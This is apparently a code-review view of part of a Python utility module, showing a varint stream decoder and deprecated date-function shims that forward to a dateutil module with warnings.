    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    # Accumulate 7-bit groups (least significant first) until a byte
    # without the 0x80 continuation bit terminates the varint.
    value = 0
    shift = 0
    byte = ord(readexactly(fh, 1))
    while byte & 0x80:
        value |= ((byte & 0x7f) << shift)
        shift += 7
        byte = ord(readexactly(fh, 1))
    value |= (byte << shift)
    return value
3995
4004
###
# Deprecation warnings for util.py splitting
###

# Date handling moved to utils.dateutil; these module-level aliases are
# kept so existing ``util.*`` consumers keep working.
defaultdateformats = dateutil.defaultdateformats

extendeddateformats = dateutil.extendeddateformats
4003
4012
def makedate(*args, **kwargs):
    """Deprecated shim forwarding to utils.dateutil.makedate."""
    nouideprecwarn("'util.makedate' is deprecated, "
                   "use 'utils.dateutil.makedate'", "4.6")
    return dateutil.makedate(*args, **kwargs)
4009
4018
def datestr(*args, **kwargs):
    """Deprecated shim forwarding to utils.dateutil.datestr."""
    nouideprecwarn("'util.datestr' is deprecated, "
                   "use 'utils.dateutil.datestr'", "4.6")
    # NOTE(review): unlike the sibling shims this also dumps a stack
    # trace — presumably to locate remaining callers; confirm before
    # removing.
    debugstacktrace()
    return dateutil.datestr(*args, **kwargs)
4016
4025
def shortdate(*args, **kwargs):
    """Deprecated shim forwarding to utils.dateutil.shortdate."""
    nouideprecwarn("'util.shortdate' is deprecated, "
                   "use 'utils.dateutil.shortdate'", "4.6")
    return dateutil.shortdate(*args, **kwargs)
4022
4031
def parsetimezone(*args, **kwargs):
    """Deprecated shim forwarding to utils.dateutil.parsetimezone."""
    nouideprecwarn("'util.parsetimezone' is deprecated, "
                   "use 'utils.dateutil.parsetimezone'", "4.6")
    return dateutil.parsetimezone(*args, **kwargs)
4028
4037
def strdate(*args, **kwargs):
    """Deprecated shim forwarding to utils.dateutil.strdate."""
    nouideprecwarn("'util.strdate' is deprecated, "
                   "use 'utils.dateutil.strdate'", "4.6")
    return dateutil.strdate(*args, **kwargs)
4034
4043
def parsedate(*args, **kwargs):
    """Deprecated shim forwarding to utils.dateutil.parsedate."""
    nouideprecwarn("'util.parsedate' is deprecated, "
                   "use 'utils.dateutil.parsedate'", "4.6")
    return dateutil.parsedate(*args, **kwargs)
4040
4049
def matchdate(*args, **kwargs):
    """Deprecated shim forwarding to utils.dateutil.matchdate."""
    nouideprecwarn("'util.matchdate' is deprecated, "
                   "use 'utils.dateutil.matchdate'", "4.6")
    return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now